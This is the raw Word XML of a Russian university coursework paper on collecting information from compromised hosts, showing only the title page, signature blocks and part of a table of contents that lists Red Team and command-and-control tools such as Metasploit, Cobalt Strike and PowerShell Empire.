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55DF" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3255"/>
        </w:tabs>
        <w:spacing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749CEE50" wp14:editId="436F7596">
            <wp:extent cx="316865" cy="5060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865" cy="506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9C1271" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791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5C7C6F5C" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791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Федеральное государственное автономное образовательное учреждение </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC9156F" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791">
      <w:pPr>
        <w:spacing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</w:rPr>
        <w:t>высшего образования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39480436" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3969"/>
        </w:tabs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«Дальневосточный федеральный университет»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD670FF" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A323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2FB9B743" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3235">
      <w:pPr>
        <w:pBdr>
          <w:top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5"/>
        <w:tblW w:w="9470" w:type="dxa"/>
        <w:tblInd w:w="0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"/>
        <w:gridCol w:w="9097"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A3235" w14:paraId="606424EA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="275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02B849E7" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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2F7DE1C" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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097" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2A10C50C" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE779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ИНСТИТУТ КОМПЬЮТЕРНЫХ НАУК И ТЕХНОЛОГИЙ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CE910C0" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE779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Департамент информационной безопасности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14349D99" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3235">
      <w:pPr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418EB632" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE77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Коротков Савелий Александрович</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblW w:w="9639" w:type="dxa"/>
        <w:tblInd w:w="0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2A3235" w14:paraId="077A06BF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AF07E2C" w14:textId="659AF79D" w:rsidR="002A3235" w:rsidRPr="00B75050" w:rsidRDefault="00B750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системы удаленного сбора информации со скомпрометированного узла</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="172527F1" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3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F6177B8" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE779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КУРСОВАЯ РАБОТА</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093ABFBD" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791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«Защита операционных систем»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDA6CBC" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791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Специальность 10.05.01 «Компьютерная безопасность»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8A2F2E" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791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Очной формы обучения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6340CB1B" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A323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7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4826"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A3235" w14:paraId="32A6C414" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1062"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4928" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47BCAB04" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3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14:paraId="2BF99AFC" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="5954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группы С9118-10.05.01ммзи</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21BB89EB" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="5954"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single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___________________      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times" w:eastAsia="Times" w:hAnsi="Times" w:cs="Times"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> Коротков </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times" w:eastAsia="Times" w:hAnsi="Times" w:cs="Times"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>С.А.</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times" w:eastAsia="Times" w:hAnsi="Times" w:cs="Times"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>__</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w: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подпись)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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>(И.О.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</w:rPr>
              <w:t>Фамилия)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A3235" w14:paraId="486D537D" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="838"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4928" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42BD0696" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3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u w:val="single"/>
              </w:rPr>
            </w:pP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14:paraId="68B281BB" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE779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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2327C996" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="5954"/>
              </w:tabs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___________________      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times" w:eastAsia="Times" w:hAnsi="Times" w:cs="Times"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> Зотов С.С.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w: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подпись)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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>(И.О.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</w:rPr>
              <w:t>Фамилия)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A3235" w14:paraId="30EAC5EA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1996"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4928" w:type="dxa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</w:tcPr>
          <w:p w14:paraId="2528ADA4" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A323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49A2E24" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE779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Регистрационный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eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">  _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_______</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49E8F272" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE779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  ___________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08A9D150" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE779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(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              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И.О.Фамилия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75CFB1FE" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791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«_____» __________________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2022г.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14:paraId="3BEC4580" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="8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«_____» ________________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2022г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72330C73" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="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  <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>__________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B718686" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="8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________________________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D428824" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="5954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       ____________________</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C6D8F2A" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="567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подпись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(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>И.О. Фамилия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521A200A" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="8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«____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_______________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2022г.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F4BFB0B" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A3235">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="8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39B77195" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791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г. Владивосток</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D21FA03" w14:textId="25C9A57D" w:rsidR="00EA4BF1" w:rsidRPr="00EA4BF1" w:rsidRDefault="00EE7791" w:rsidP="00375B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12F12AB8" w14:textId="45EEDC62" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00EA4BF1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Оглавление</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-839933530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auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="6559B18C" w14:textId="0EC8A377" w:rsidR="008F5C28" w:rsidRDefault="008F5C28" w:rsidP="00B41F73">
          <w:pPr>
            <w:pStyle w:val="ab"/>
            <w:spacing w:line="336" w:lineRule="auto"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="3CFD40CB" w14:textId="0E8E91A1" w:rsidR="008F5C28" w:rsidRPr="00BB644C" w:rsidRDefault="008F5C28" w:rsidP="00B41F73">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:spacing w:line="336" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>Введение</w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644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B644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>3</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5AAB8C07" w14:textId="404577B1" w:rsidR="008F5C28" w:rsidRPr="00BB644C" w:rsidRDefault="008F5C28" w:rsidP="00B41F73">
          <w:pPr>
            <w:pStyle w:val="20"/>
            <w:spacing w:line="336" w:lineRule="auto"/>
            <w:ind w:left="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>1</w:t>
          </w:r>
          <w:r w:rsidR="00287687" w:rsidRPr="00BB644C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BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>Системы поддержки атак</w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644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B644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>5</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0227D20C" w14:textId="73F59CE4" w:rsidR="008F5C28" w:rsidRPr="00BB644C" w:rsidRDefault="00287687" w:rsidP="00B41F73">
          <w:pPr>
            <w:pStyle w:val="30"/>
            <w:spacing w:line="336" w:lineRule="auto"/>
            <w:ind w:left="446"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t xml:space="preserve">1.1 Парадигма </w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>Red</w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644C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BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>Team</w:t>
          </w:r>
          <w:r w:rsidR="008F5C28" w:rsidRPr="00BB644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8F5C28" w:rsidRPr="00BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>5</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4CB1C03E" w14:textId="4F662F63" w:rsidR="008F5C28" w:rsidRPr="00BB644C" w:rsidRDefault="00287687" w:rsidP="00B41F73">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:spacing w:line="336" w:lineRule="auto"/>
            <w:ind w:firstLine="720"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>1.1.1 Metasploit Framework</w:t>
          </w:r>
          <w:r w:rsidR="008F5C28" w:rsidRPr="00BB644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B644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>8</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5A28F8F8" w14:textId="31693811" w:rsidR="008F5C28" w:rsidRPr="00B41F73" w:rsidRDefault="00287687" w:rsidP="00B41F73">
          <w:pPr>
            <w:pStyle w:val="20"/>
            <w:spacing w:line="336" w:lineRule="auto"/>
            <w:ind w:left="216" w:firstLine="504"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>1.1.2 Cobalt Strike</w:t>
          </w:r>
          <w:r w:rsidR="008F5C28" w:rsidRPr="00BB644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B41F73">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>9</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0460A008" w14:textId="79CFA45E" w:rsidR="008E7005" w:rsidRPr="00BB644C" w:rsidRDefault="0015565F" w:rsidP="00B41F73">
          <w:pPr>
            <w:pStyle w:val="30"/>
            <w:spacing w:line="336" w:lineRule="auto"/>
            <w:ind w:left="446" w:firstLine="274"/>
            <w:outlineLvl w:val="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>1.</w:t>
          </w:r>
          <w:r w:rsidR="00287687" w:rsidRPr="00BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>1.</w:t>
          </w:r>
          <w:r w:rsidR="00483920" w:rsidRPr="00BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>3</w:t>
          </w:r>
          <w:r w:rsidR="00287687" w:rsidRPr="00BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve"> Viper</w:t>
          </w:r>
          <w:r w:rsidR="008F5C28" w:rsidRPr="00BB644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87687" w:rsidRPr="00BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>12</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7604E5CB" w14:textId="77777777" w:rsidR="00483920" w:rsidRPr="00BB644C" w:rsidRDefault="00483920" w:rsidP="00B41F73">
          <w:pPr>
            <w:spacing w:line="336" w:lineRule="auto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BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>2 Command and Control servers</w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644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BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>13</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="67E2CA8E" w14:textId="77777777" w:rsidR="00483920" w:rsidRPr="00BB644C" w:rsidRDefault="00483920" w:rsidP="00B41F73">
          <w:pPr>
            <w:spacing w:line="336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B644C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BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>2.1 Общие сведения</w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644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BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>13</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="676D45C3" w14:textId="77777777" w:rsidR="00483920" w:rsidRPr="00BB644C" w:rsidRDefault="00483920" w:rsidP="00B41F73">
          <w:pPr>
            <w:spacing w:line="336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B644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:tab/>
            <w:t>2.2 Стадии заражения</w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644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BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>14</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="66CA2F17" w14:textId="77777777" w:rsidR="00483920" w:rsidRPr="00BB644C" w:rsidRDefault="00483920" w:rsidP="00B41F73">
          <w:pPr>
            <w:spacing w:line="336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B644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidRPr="00BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:tab/>
            <w:t>2.2.1 Заражение системы</w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644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BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>14</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6B2A6595" w14:textId="77CD5301" w:rsidR="00483920" w:rsidRPr="00BB644C" w:rsidRDefault="00483920" w:rsidP="00B41F73">
          <w:pPr>
            <w:spacing w:line="336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B644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidRPr="00BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:tab/>
            <w:t>2.2.2 Эскалация привилегий</w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644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BB644C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B41F73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14:paraId="4F4C33F2" w14:textId="77777777" w:rsidR="00483920" w:rsidRPr="00BB644C" w:rsidRDefault="00483920" w:rsidP="00B41F73">
          <w:pPr>
            <w:spacing w:line="336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B644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:tab/>
            <w:t>2.3 Платформы управления и контроля</w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644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BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>15</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0991B198" w14:textId="77777777" w:rsidR="00483920" w:rsidRPr="00BB644C" w:rsidRDefault="00483920" w:rsidP="00B41F73">
          <w:pPr>
            <w:spacing w:line="336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B644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidRPr="00BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:tab/>
            <w:t>2.3.1</w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644C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Covenant</w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644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BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>16</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="17E00DDA" w14:textId="77777777" w:rsidR="00483920" w:rsidRPr="00BB644C" w:rsidRDefault="00483920" w:rsidP="00B41F73">
          <w:pPr>
            <w:spacing w:line="336" w:lineRule="auto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BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidRPr="00BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:tab/>
            <w:t xml:space="preserve">2.3.2 </w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>PowerShell Empire</w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644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BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>17</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4CA4C624" w14:textId="77777777" w:rsidR="00483920" w:rsidRPr="00BB644C" w:rsidRDefault="00483920" w:rsidP="00B41F73">
          <w:pPr>
            <w:spacing w:line="336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B644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>3 Получение данных о скомпрометированной системе</w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644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BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>20</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="61F107B8" w14:textId="77777777" w:rsidR="00483920" w:rsidRPr="00BB644C" w:rsidRDefault="00483920" w:rsidP="00B41F73">
          <w:pPr>
            <w:spacing w:line="336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B644C">
            <w:rPr>
